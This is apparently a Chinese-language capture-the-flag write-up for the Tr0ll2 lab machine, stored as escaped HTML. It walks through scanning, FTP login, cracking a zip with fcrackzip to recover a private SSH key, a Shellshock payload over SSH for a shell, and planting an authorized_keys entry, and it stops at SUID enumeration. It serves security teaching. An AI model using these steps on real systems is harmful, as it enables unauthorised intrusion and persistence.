![\"image-20240315125553761\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115614.png\")
<\/div><\/p>\n\u653e\u8fdbvmware\u540e\u5148\u5347\u7ea7\u4e00\u4e0b\uff0c\u6253\u5f00\uff1a<\/p>\n
![\"image-20240315165020307\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115616.png\")
<\/div><\/p>\n\u9996\u5148\u626b\u4e00\u4e0b\uff1a<\/p>\n
![\"image-20240315165047154\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115617.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nnmap -sV -sT -T4 -p- 10.161.61.134<\/code><\/pre>\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-03-15 04:51 EDT\nNmap scan report for 10.161.61.134\nHost is up (0.015s latency).\nNot shown: 65532 closed tcp ports (conn-refused)\nPORT STATE SERVICE VERSION\n21\/tcp open ftp vsftpd 2.0.8 or later\n22\/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)\n80\/tcp open http Apache httpd 2.2.22 ((Ubuntu))\nService Info: Host: Tr0ll; OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 24.33 seconds<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u5f00\u542f\u4e8680<\/code>\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fdb\u884c\u626b\u63cf\uff0c\u9996\u5148\u5148\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n![\"image-20240315165352712\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u679c\u7136\uff0c\u53c8\u6765\uff0c\u626b\u4e00\u4e0b\uff1a<\/p>\n
gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/10.161.61.134 -f -t 200<\/code><\/pre>\n\/icons\/ (Status: 403) [Size: 287]\n\/cgi-bin\/ (Status: 403) [Size: 289]\n\/doc\/ (Status: 403) [Size: 285]\n\/server-status\/ (Status: 403) [Size: 295]<\/code><\/pre>\n\u8fd9\u626b\u7684\u5565\u73a9\u610f\uff0c\u91cd\u65b0\u6539\u4e00\u4e0b\uff1a<\/p>\n
gobuster dir -w \/usr\/share\/wordlists\/dirb\/common.txt -u http:\/\/10.161.61.134 <\/code><\/pre>\n\/.hta (Status: 403) [Size: 285]\n\/.htpasswd (Status: 403) [Size: 290]\n\/.htaccess (Status: 403) [Size: 290]\n\/cgi-bin\/ (Status: 403) [Size: 289]\n\/index (Status: 200) [Size: 110]\n\/index.html (Status: 200) [Size: 110]\n\/robots.txt (Status: 200) [Size: 346]\n\/robots (Status: 200) [Size: 346]\n\/server-status (Status: 403) [Size: 294]<\/code><\/pre>\n\u7b49\u7684\u65f6\u5019\u624b\u5de5\u63a2\u6d4b\u4e00\u4e0b\uff1a<\/p>\n
http:\/\/10.161.61.134\/robots.txt\nUser-agent:*\nDisallow:\n\/noob\n\/nope\n\/try_harder\n\/keep_trying\n\/isnt_this_annoying\n\/nothing_here\n\/404\n\/LOL_at_the_last_one\n\/trolling_is_fun\n\/zomg_is_this_it\n\/you_found_me\n\/I_know_this_sucks\n\/You_could_give_up\n\/dont_bother\n\/will_it_ever_end\n\/I_hope_you_scripted_this\n\/ok_this_is_it\n\/stop_whining\n\/why_are_you_still_looking\n\/just_quit\n\/seriously_stop<\/code><\/pre>\n\u5c1d\u8bd5\u770b\u4e00\u4e0b\u8fd9\u4e9b\u76ee\u5f55\uff1a<\/p>\n
\u6ca1\u53d1\u73b0\u5565\u4e1c\u897f\uff0c\u53ea\u6709\u4e00\u5f20\u56fe\u7247\uff0c\u7b49\u4e0b\u6ca1\u601d\u8def\u53ef\u4ee5\u770b\u770b\u6709\u6ca1\u6709\u4ec0\u4e48\u9690\u85cf\u6587\u4ef6\u3002<\/p>\n
\u6f0f\u6d1e\u53d1\u6398<\/h2>\n\u5c1d\u8bd5ftp\u767b\u5f55<\/h3>\n
\u8d26\u53f7\u5bc6\u7801\u5747\u4f7f\u7528Tr0ll<\/code>:<\/p>\nConnected to 10.161.61.134.\n220 Welcome to Tr0ll FTP... Only noobs stay for a while...\nName (10.161.61.134:kali): Tr0ll\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir\n229 Entering Extended Passive Mode (|||32246|).\n150 Here comes the directory listing.\n-rw-r--r-- 1 0 0 1474 Oct 04 2014 lmao.zip\n226 Directory send OK.\nftp> get lmao.zip\nlocal: lmao.zip remote: lmao.zip\n229 Entering Extended Passive Mode (|||19663|).\n150 Opening BINARY mode data connection for lmao.zip (1474 bytes).\n100% |**************************************************************| 1474 2.95 MiB\/s 00:00 ETA\n226 Transfer complete.\n1474 bytes received in 00:00 (1.02 MiB\/s)\nftp> exit\n221 Goodbye.<\/code><\/pre>\n\u67e5\u770b\u654f\u611f\u6587\u4ef6<\/h3>\n
\u5148\u67e5\u770b\u4e00\u4e0b\u6587\u4ef6\u662f\u5565\uff0c\u53d1\u73b0\u662f\u538b\u7f29\u5305\uff0c\u89e3\u538b\u770b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ file lmao.zip \nlmao.zip: Zip archive data, at least v2.0 to extract, compression method=deflate\n\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ unzip lmao.zip \nArchive: lmao.zip\n[lmao.zip] noob password: \npassword incorrect--reenter: \npassword incorrect--reenter: \n skipping: noob incorrect password<\/code><\/pre>\n\u731c\u60f3\u662f\u4e0d\u662f\u4f2a\u52a0\u5bc6\uff0c\u5c1d\u8bd5\u62ff\u51fa\u6765\u770b\u4e00\u4e0b\uff1a<\/p>\n
\n\u53ef\u4ee5\u53c2\u8003\uff1ahttps:\/\/blog.csdn.net\/Goodric\/article\/details\/117599617<\/a><\/p>\n<\/blockquote>\n<\/div>
\n<\/div><\/p>\n\u5c1d\u8bd5\u7206\u7834\uff0c\u672a\u679c<\/h3>\n
\u8fd8\u771f\u52a0\u5bc6\u4e86\uff0c\u628a\u521a\u521a\u7684\u76ee\u5f55\u7206\u7834\u4e00\u4e0b\uff1a\u5b57\u5178\u5c31\u8bbe\u4e3arobots.txt<\/code>\u52a0\u4e0arobots.txt\u91cc\u7684\u5185\u5bb9<\/code>\uff1a<\/p>\nsed 's\/\\\/\/\/g' temp.txt >> temp.txt<\/code><\/pre>\n\/robots.txt\n\/noob\n\/nope\n\/try_harder\n\/keep_trying\n\/isnt_this_annoying\n\/nothing_here\n\/404\n\/LOL_at_the_last_one\n\/trolling_is_fun\n\/zomg_is_this_it\n\/you_found_me\n\/I_know_this_sucks\n\/You_could_give_up\n\/dont_bother\n\/will_it_ever_end\n\/I_hope_you_scripted_this\n\/ok_this_is_it\n\/stop_whining\n\/why_are_you_still_looking\n\/just_quit\n\/seriously_stop\nrobots.txt\nnoob\nnope\ntry_harder\nkeep_trying\nisnt_this_annoying\nnothing_here\n404\nLOL_at_the_last_one\ntrolling_is_fun\nzomg_is_this_it\nyou_found_me\nI_know_this_sucks\nYou_could_give_up\ndont_bother\nwill_it_ever_end\nI_hope_you_scripted_this\nok_this_is_it\nstop_whining\nwhy_are_you_still_looking\njust_quit\nseriously_stop<\/code><\/pre>\n\u8fdb\u884c\u7206\u7834\uff0c\u4f46\u662f\u6ca1\u627e\u5230\u5bc6\u7801\u3002<\/p>\n
\u7ee7\u7eed\u4fe1\u606f\u641c\u96c6\u3002<\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h2>\nFUZZ<\/h3>\n
\u521a\u521a\u67e5\u770b\u7684\u65f6\u5019\u53d1\u73b0\u6709\u7684\u76ee\u5f55\u65e0\u6cd5\u6253\u5f00\u6709\u7684\u5219\u6709\u7167\u7247\uff0cfuzz\u4e00\u4e0b\uff0c\u770b\u770b\u54ea\u4e9b\u5728\u4f7f\u7528\uff1a<\/p>\n
wfuzz -c --hc 404 -w temp.txt http:\/\/10.161.61.134\/FUZZ<\/code><\/pre>\n<\/div><\/p>\n\u5e94\u8be5\u90fd\u662f\u540c\u4e00\u5f20\u7167\u7247\uff0c\u73b0\u5728\u4e5f\u6ca1\u5176\u4ed6\u8def\u5b50\u4e86\uff0c\u5c1d\u8bd5\u4e0b\u8f7d\u4e0b\u6765\u67e5\u770b\u4e00\u4e0b<\/p>\n
\u9690\u5199\u5206\u6790<\/h3>\n
\u5168\u90e8\u4e0b\u8f7d\u4e0b\u6765\u4ee5\u540e\uff0c\u770b\u5230\u5927\u5c0f\u6709\u533a\u522b\uff1a<\/p>\n
wget http:\/\/10.161.61.134\/ok_this_is_it\/cat_the_troll.jpg -O tr0ll1.jpg # \u8f93\u9519\u4e86\uff0c\u4f46\u662f\u4e5f\u6b63\u5e38\u4e0b\u8f7d\u4e86\nwget http:\/\/10.161.61.134\/dont_bother\/cat_the_troll.jpg -O tr0ll2.jpg\nwget http:\/\/10.161.61.134\/keep_trying\/cat_the_troll.jpg -O tr0ll3.jpg\nwget http:\/\/10.161.61.134\/noob\/cat_the_troll.jpg -O tr0ll4.jpg<\/code><\/pre>\n\u67e5\u770b\u5927\u5c0f\uff0c\u53d1\u73b0\u6709\u4e00\u4e2a\u5927\u5c0f\u4e0d\u4e00\u6837\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Tr0ll]\n\u2514\u2500$ ls -l *.jpg \n-rw-r--r-- 1 kali kali 15831 Oct 4 2014 tr0ll1.jpg\n-rw-r--r-- 1 kali kali 15873 Oct 4 2014 tr0ll2.jpg\n-rw-r--r-- 1 kali kali 15831 Oct 4 2014 tr0ll3.jpg\n-rw-r--r-- 1 kali kali 15831 Oct 4 2014 tr0ll4.jpg<\/code><\/pre>\n\u8fdb\u884c\u5206\u6790\uff1a<\/p>\n
strings tr0ll2.jpg<\/code><\/pre>\n\u53d1\u73b0\u6709\u4e00\u4e2a\u63d0\u793a\uff1a<\/p>\n
Look Deep within y0ur_self for the answer<\/code><\/pre>\n\u67e5\u770b\u63d0\u793a<\/h3>\n
\u6253\u5f00\u770b\u4e00\u4e0b\u8fd9\u4e2a\u76ee\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u6253\u5f00\u53d1\u73b0\u662f\u4e00\u4e2a\u5b57\u5178\uff1a<\/p>\n
<\/div><\/p>\n\u4e00\u770b\u5c31\u662fbase64\u7f16\u7801\u7684\uff0c\u4e0d\u8fc7\u4e5f\u5f97\u5c0f\u5fc3\u88ab\u4f5c\u8005\u7ed9\u516d\u4e86\uff0c\u8fdb\u884c\u89e3\u7801\u4ee5\u540e\u653e\u8fdb\u8fd9\u4e2a\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
wget http:\/\/10.161.61.134\/y0ur_self\/answer.txt\nbase64 -d answer.txt > answer2.txt\nfcrackzip -u -D -p answer.txt lmao.zip\nfcrackzip -u -D -p answer2.txt lmao.zip<\/code><\/pre>\n\n-u<\/code>: \u8fd9\u4e2a\u9009\u9879\u544a\u8bc9fcrackzip<\/code>\u53ea\u5c1d\u8bd5\u7834\u89e3\u52a0\u5bc6ZIP\u6587\u4ef6\u7684\u5bc6\u7801\uff0c\u800c\u4e0d\u662f\u89e3\u538b\u7f29\u6587\u4ef6\u3002\u5982\u679c\u4e0d\u4f7f\u7528\u8fd9\u4e2a\u9009\u9879\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u5b83\u4f1a\u5c1d\u8bd5\u89e3\u538b\u7f29\u6587\u4ef6\u3002<\/li>\n-D<\/code>: \u8fd9\u4e2a\u9009\u9879\u544a\u8bc9fcrackzip<\/code>\u4f7f\u7528\u5b57\u5178\u653b\u51fb\u3002\u5b83\u4f1a\u5c1d\u8bd5\u4f7f\u7528\u6307\u5b9a\u7684\u5b57\u5178\u6587\u4ef6\u4e2d\u7684\u5355\u8bcd\u4f5c\u4e3a\u5bc6\u7801\u6765\u89e3\u9501ZIP\u6587\u4ef6\u3002<\/li>\n-p answer.txt<\/code>: \u8fd9\u4e2a\u9009\u9879\u6307\u5b9a\u4e86\u5b57\u5178\u6587\u4ef6\u7684\u8def\u5f84\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0canswer.txt<\/code>\u662f\u4f60\u5e0c\u671bfcrackzip<\/code>\u4f7f\u7528\u7684\u5b57\u5178\u6587\u4ef6\u7684\u8def\u5f84\u3002<\/li>\nlmao.zip<\/code>: \u8fd9\u662f\u8981\u7834\u89e3\u7684ZIP\u6587\u4ef6\u7684\u540d\u79f0\u3002\u4f60\u9700\u8981\u5c06\u8fd9\u4e2a\u53c2\u6570\u66ff\u6362\u4e3a\u4f60\u8981\u5c1d\u8bd5\u7834\u89e3\u7684\u5b9e\u9645ZIP\u6587\u4ef6\u7684\u8def\u5f84\u548c\u540d\u79f0\u3002<\/li>\n<\/ul>\n\u53d1\u73b0\u5bc6\u7801\uff1a<\/p>\n
PASSWORD FOUND!!!!: pw == ItCantReallyBeThisEasyRightLOL<\/code><\/pre>\n\u5bb3\uff0c\u8001\u8bdd\u8bf4\u7684\u679c\u7136\u6ca1\u9519\uff0c\u6e17\u900f\u6d4b\u8bd5\u6700\u7ec8\u8fd8\u662f\u4fe1\u606f\u641c\u96c6\u3002\u3002\u3002\u3002<\/p>\n
\u67e5\u770b\u4e00\u4e0b\u6709\u5565\u6d88\u606f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Tr0ll]\n\u2514\u2500$ unzip lmao.zip\nArchive: lmao.zip\n[lmao.zip] noob password: \n inflating: noob \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Tr0ll]\n\u2514\u2500$ ls \nanswer2.txt answer.txt lmao.zip noob temp.txt tr0ll1.jpg tr0ll2.jpg tr0ll3.jpg tr0ll4.jpg\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Tr0ll]\n\u2514\u2500$ cat noob \n-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEAsIthv5CzMo5v663EMpilasuBIFMiftzsr+w+UFe9yFhAoLqq\nyDSPjrmPsyFePcpHmwWEdeR5AWIv\/RmGZh0Q+Qh6vSPswix7\/\/SnX\/QHvh0CGhf1\n\/9zwtJSMely5oCGOujMLjDZjryu1PKxET1CcUpiylr2kgD\/fy11Th33KwmcsgnPo\nq+pMbCh86IzNBEXrBdkYCn222djBaq+mEjvfqIXWQYBlZ3HNZ4LVtG+5in9bvkU5\nz+13lsTpA9px6YIbyrPMMFzcOrxNdpTY86ozw02+MmFaYfMxyj2GbLej0+qniwKy\ne5SsF+eNBRKdqvSYtsVE11SwQmF4imdJO0buvQIDAQABAoIBAA8ltlpQWP+yduna\nu+W3cSHrmgWi\/Ge0Ht6tP193V8IzyD\/CJFsPH24Yf7rX1xUoIOKtI4NV+gfjW8i0\ngvKJ9eXYE2fdCDhUxsLcQ+wYrP1j0cVZXvL4CvMDd9Yb1JVnq65QKOJ73CuwbVlq\nUmYXvYHcth324YFbeaEiPcN3SIlLWms0pdA71Lc8kYKfgUK8UQ9Q3u58Ehlxv079\nLa35u5VH7GSKeey72655A+t6d1ZrrnjaRXmaec\/j3Kvse2GrXJFhZ2IEDAfa0GXR\nxgl4PyN8O0L+TgBNI\/5nnTSQqbjUiu+aOoRCs0856EEpfnGte41AppO99hdPTAKP\naq\/r7+UCgYEA17OaQ69KGRdvNRNvRo4abtiKVFSSqCKMasiL6aZ8NIqNfIVTMtTW\nK+WPmz657n1oapaPfkiMRhXBCLjR7HHLeP5RaDQtOrNBfPSi7AlTPrRxDPQUxyxx\nn48iIflln6u85KYEjQbHHkA3MdJBX2yYFp\/w6pYtKfp15BDA8s4v9HMCgYEA0YcB\nTEJvcW1XUT93ZsN+lOo\/xlXDsf+9Njrci+G8l7jJEAFWptb\/9ELc8phiZUHa2dIh\nWBpYEanp2r+fKEQwLtoihstceSamdrLsskPhA4xF3zc3c1ubJOUfsJBfbwhX1tQv\nibsKq9kucenZOnT\/WU8L51Ni5lTJa4HTQwQe9A8CgYEAidHV1T1g6NtSUOVUCg6t\n0PlGmU9YTVmVwnzU+LtJTQDiGhfN6wKWvYF12kmf30P9vWzpzlRoXDd2GS6N4rdq\nvKoyNZRw+bqjM0XT+2CR8dS1DwO9au14w+xecLq7NeQzUxzId5tHCosZORoQbvoh\nywLymdDOlq3TOZ+CySD4\/wUCgYEAr\/ybRHhQro7OVnneSjxNp7qRUn9a3bkWLeSG\nth8mjrEwf\/b\/1yai2YEHn+QKUU5dCbOLOjr2We\/Dcm6cue98IP4rHdjVlRS3oN9s\nG9cTui0pyvDP7F63Eug4E89PuSziyphyTVcDAZBriFaIlKcMivDv6J6LZTc17sye\nq51celUCgYAKE153nmgLIZjw6+FQcGYUl5FGfStUY05sOh8kxwBBGHW4\/fC77+NO\nvW6CYeE+bA2AQmiIGj5CqlNyecZ08j4Ot\/W3IiRlkobhO07p3nj601d+OgTjjgKG\nzp8XZNG8Xwnd5K59AVXZeiLe2LGeYbUKGbHyKE3wEVTTEmgaxF4D1g==\n-----END RSA PRIVATE KEY-----\n<\/code><\/pre>\n\u662f\u4e00\u4e2a\u79c1\u94a5\uff0cnice\uff01\uff01<\/p>\n
\u83b7\u53d6\u7528\u6237<\/h2>\nssh\u767b\u5f55shellShock<\/h3>\nssh noob@10.161.61.134 -i noob<\/code><\/pre>\n\u4f46\u662f\u8fd8\u662f\u9700\u8981\u5bc6\u7801\uff0c\u79bb\u8c31\uff1a<\/p>\n
ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i noob noob@10.161.61.134 <\/code><\/pre>\n\u8fdb\u53bb\u4e86\uff0c\u53c8\u597d\u50cf\u6ca1\u8fdb\u53bb\uff1a<\/p>\n
TRY HARDER LOL!\nConnection to 10.161.61.134 closed.<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\u53d1\u751f\u4e86\u5565\uff1a<\/p>\n
ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i noob noob@10.161.61.134 -v<\/code><\/pre>\nOpenSSH_9.6p1 Debian-3, OpenSSL 3.1.4 24 Oct 2023\ndebug1: Reading configuration data \/etc\/ssh\/ssh_config\ndebug1: \/etc\/ssh\/ssh_config line 19: include \/etc\/ssh\/ssh_config.d\/*.conf matched no files\ndebug1: \/etc\/ssh\/ssh_config line 21: Applying options for *\ndebug1: Connecting to 10.161.61.134 [10.161.61.134] port 22.\ndebug1: Connection established.\ndebug1: identity file noob type -1\ndebug1: identity file noob-cert type -1\ndebug1: Local version string SSH-2.0-OpenSSH_9.6p1 Debian-3\ndebug1: Remote protocol version 2.0, remote software version OpenSSH_5.9p1 Debian-5ubuntu1.4\ndebug1: compat_banner: match: OpenSSH_5.9p1 Debian-5ubuntu1.4 pat OpenSSH_5* compat 0x0c000002\ndebug1: Authenticating to 10.161.61.134:22 as 'noob'\ndebug1: load_hostkeys: fopen \/home\/kali\/.ssh\/known_hosts2: No such file or directory\ndebug1: load_hostkeys: fopen \/etc\/ssh\/ssh_known_hosts: No such file or directory\ndebug1: load_hostkeys: fopen \/etc\/ssh\/ssh_known_hosts2: No such file or directory\ndebug1: SSH2_MSG_KEXINIT sent\ndebug1: SSH2_MSG_KEXINIT received\ndebug1: kex: algorithm: ecdh-sha2-nistp256\ndebug1: kex: host key algorithm: ecdsa-sha2-nistp256\ndebug1: kex: server->client cipher: aes128-ctr MAC: umac-64@openssh.com compression: none\ndebug1: kex: client->server cipher: aes128-ctr MAC: umac-64@openssh.com compression: none\ndebug1: expecting SSH2_MSG_KEX_ECDH_REPLY\ndebug1: SSH2_MSG_KEX_ECDH_REPLY received\ndebug1: Server host key: ecdsa-sha2-nistp256 SHA256:I3xuSgcBlIsoldKTkOyVYwx8B4NLGl0fDDTi0H6ExYg\ndebug1: load_hostkeys: fopen \/home\/kali\/.ssh\/known_hosts2: No such file or directory\ndebug1: load_hostkeys: fopen \/etc\/ssh\/ssh_known_hosts: No such file or directory\ndebug1: load_hostkeys: fopen \/etc\/ssh\/ssh_known_hosts2: No such file or directory\ndebug1: Host '10.161.61.134' is known and matches the ECDSA host key.\ndebug1: Found key in \/home\/kali\/.ssh\/known_hosts:24\ndebug1: rekey out after 4294967296 blocks\ndebug1: SSH2_MSG_NEWKEYS sent\ndebug1: expecting SSH2_MSG_NEWKEYS\ndebug1: SSH2_MSG_NEWKEYS received\ndebug1: rekey in after 4294967296 blocks\ndebug1: SSH2_MSG_SERVICE_ACCEPT received\ndebug1: Authentications that can continue: publickey,password\ndebug1: Next authentication method: publickey\ndebug1: get_agent_identities: bound agent to hostkey\ndebug1: get_agent_identities: ssh_fetch_identitylist: agent contains no identities\ndebug1: Will attempt key: noob explicit\ndebug1: Trying private key: noob\nAuthenticated to 10.161.61.134 ([10.161.61.134]:22) using "publickey".\ndebug1: channel 0: new session [client-session] (inactive timeout: 0)\ndebug1: Requesting no-more-sessions@openssh.com\ndebug1: Entering interactive session.\ndebug1: pledge: filesystem\ndebug1: Remote: Forced command. \/\/\u6240\u4ee5\u662f\u53ef\u4ee5\u6267\u884c\u7684\uff01\uff01\uff01\ndebug1: Sending environment.\ndebug1: channel 0: setting env LANG = "en_US.UTF-8"\ndebug1: client_input_channel_req: channel 0 rtype exit-status reply 0\ndebug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0\nTRY HARDER LOL!\ndebug1: channel 0: free: client-session, nchannels 1\nConnection to 10.161.61.134 closed.\nTransferred: sent 2912, received 1712 bytes, in 0.1 seconds\nBytes per second: sent 52348.4, received 30776.2\ndebug1: Exit status 0<\/code><\/pre>\n\u5c1d\u8bd5\u5f39\u4e00\u4e2ashell\uff1a<\/p>\n
\nshellshock:\u901a\u5e38\uff0c\u7528\u6237\u53ef\u4ee5\u901a\u8fc7\u5c06\u5355\u4e2a\u547d\u4ee4\u9644\u52a0\u5230 SSH \u547d\u4ee4\u6765\u901a\u8fc7 SSH \u6267\u884c\u8be5\u547d\u4ee4\u3002\u4f7f\u7528\u5f3a\u5236\u547d\u4ee4\u65f6\uff0c\u9644\u52a0\u547d\u4ee4\u5c06\u88ab\u5ffd\u7565\uff0c\u4f46\u5b83\u5b58\u50a8\u5728 SSH_ORIGINAL_COMMAND \u73af\u5883\u53d8\u91cf\u4e2d \u3002\u7136\u540e\u53ef\u4ee5\u901a\u8fc7\u5728\u539f\u59cb\u547d\u4ee4\u4e2d\u5305\u542b Shellshock \u6709\u6548\u8d1f\u8f7d\u6765\u5229\u7528\u6b64\u529f\u80fd\u3002\u7136\u540e\uff0c\u5728\u8fd0\u884c\u5f3a\u5236\u547d\u4ee4\u4e4b\u524d\uff0c\u6709\u6548\u8d1f\u8f7d\u5c06\u81ea\u52a8\u6267\u884c\u3002<\/p>\n
\u53c2\u8003\uff1ahttps:\/\/github.com\/jeholliday\/shellshock<\/a><\/p>\nhttps:\/\/gabb4r.gitbook.io\/oscp-notes\/web-http\/shellshock<\/a><\/p>\n<\/blockquote>\n$ ssh <user>@<server address> '() { :; }; echo "pwned"'<\/code><\/pre>\n\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i noob noob@10.161.61.134 '() { :; }; echo "pwned"'\n# pwned\n# TRY HARDER LOL!<\/code><\/pre>\n\u8bf4\u660e\u662f\u6709\u8fd9\u4e2a\u6f0f\u6d1e\u7684\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i noob noob@10.161.61.134 '() { :;}; \/bin\/bash'<\/code><\/pre>\n<\/div><\/p>\n\u83b7\u53d6\u5230\u4e86shell\uff0c\u4e0d\u8fc7\u611f\u89c9\u4ea4\u4e92\u6027\u4e0d\u662f\u5f88\u597d\uff0c\u5c1d\u8bd5\u4f20\u4e00\u4e2a\u516c\u94a5\u4e0a\u53bb\uff0c\u5b9e\u73b0ssh\u767b\u5f55\uff1a<\/p>\n
# kali\nssh-keygen -b 2048 -t rsa<\/code><\/pre>\n# noob\necho 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDjqj8kG2CV+EIp0gPIsGtgoFz7zkhFZDzeunBU9PWcQTOaO85F\/LBFxD8+EVkGjSB1CRfQReTlUEmhctbA0xVYFOlHGi94m9otYKS5J8R2xKZEjJklP7YvWyOtm\/XDfNCn5p99J0pZhVfziHvkLLngkRsRCGSrJbP0abmSYtDl3fIC3hOwtxripIZbTuaRGZ2sJpgXIvbr8ObSAKHPcAnkT4f9mJDn+J8umnnsW2LU2okv56QoGyuaIHbNFU9KSMu8N1e48gxSmwFNlOONxynNg9V0m4qzZ4VBPNes2dfupMsuETRZHkV7TcVqAcnud59IW8N\/O+vxZpc6St7Wfaed kali@kali'> .ssh\/authorized_keys<\/code><\/pre>\n\u7136\u540e\u5373\u53ef\u5c1d\u8bd5\u8fdb\u884c\u767b\u9646\uff1a<\/p>\n
ssh noob@10.161.61.134 -i Tr0llssh -o PubkeyAcceptedKeyTypes=ssh-rsa\n# \u8fd9\u91cc\u7684Tr0llssh\u662f\u6211\u7684\u79c1\u94a5\u7684\u540d\u5b57<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u67e5\u770b\u5e38\u89c1\u6f0f\u6d1e\u4ee5\u53ca\u7cfb\u7edf\u4fe1\u606f<\/h3>\n
\u5c3d\u91cf\u4e0d\u5185\u6838\u63d0\u6743\u4e86\uff0c\u6ca1\u5565\u610f\u601d\uff0c\u4e00\u628a\u68ad\u7684\u4e1c\u897f\u3002\u3002<\/p>\n
noob@Tr0ll2:~$ whoami;id\nnoob\nuid=1002(noob) gid=1002(noob) groups=1002(noob)\nnoob@Tr0ll2:~$ uname -a\nLinux Tr0ll2 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU\/Linux\nnoob@Tr0ll2:~$ lsb_release -a\nNo LSB modules are available.\nDistributor ID: Ubuntu\nDescription: Ubuntu 12.04.1 LTS\nRelease: 12.04\nCodename: precise\nnoob@Tr0ll2:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/bin\/su\n\/bin\/umount \n\/bin\/ping\n\/bin\/mount\n\/bin\/fusermount\n\/bin\/ping6\n\/usr\/bin\/chfn\n\/usr\/bin\/at\n\/usr\/bin\/newgrp\n\/usr\/bin\/sudoedit\n\/usr\/bin\/passwd\n\/usr\/bin\/mtr\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/traceroute6.iputils\n\/usr\/bin\/gpasswd\n\/usr\/sbin\/pppd\n\/usr\/sbin\/uuidd\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/vmware-tools\/bin32\/vmware-user-suid-wrapper\n\/usr\/lib\/vmware-tools\/bin64\/vmware-user-suid-wrapper\n\/usr\/lib\/pt_chown\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/nothing_to_see_here\/choose_wisely\/door2\/r00t\n\/nothing_to_see_here\/choose_wisely\/door3\/r00t\n\/nothing_to_see_here\/choose_wisely\/door1\/r00t\nnoob@Tr0ll2:~$ crontab -l\nno crontab for noob<\/code><\/pre>\n\u5c1d\u8bd5sudo su<\/code>\u53ef\u60dc\u6ca1\u5bc6\u7801\u3002<\/p>\n\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u53ef\u7591\u6587\u4ef6r00t<\/code>\uff0c\u4e0d\u51fa\u610f\u5916\u7684\u8bdd\u5e94\u8be5\u5c31\u662f\u6211\u4eec\u9700\u8981\u641e\u5b9a\u7684\u4e1c\u897f\u4e86\uff01<\/p>\nnoob@Tr0ll2:~$ cd \/nothing_to_see_here\/choose_wisely\/door1\/\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door1$ ls\nr00t\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door1$ file\nUsage: file [-bchikLlNnprsvz0] [--apple] [--mime-encoding] [--mime-type]\n [-e testname] [-F separator] [-f namefile] [-m magicfiles] file ...\n file -C [-m magicfiles]\n file [--help]\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door1$ file r00t\nr00t: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU\/Linux 2.6.24, BuildID[sha1]=0x80ac0ab3dd7ab04707b2fec1a7bca030e20e4654, not stripped<\/code><\/pre>\n\u574f\u4e86\uff0c\u53ef\u80fd\u8981\u9760pwn\u4e86\uff01<\/p>\n
pwn r00t<\/h3>\n
\u60f3\u5148\u62ff\u5230\u672c\u5730\u6765\uff1a<\/p>\n
python -m SimpleHTTPServer 8080<\/code><\/pre>\n\u4f46\u662f\uff1a<\/p>\n
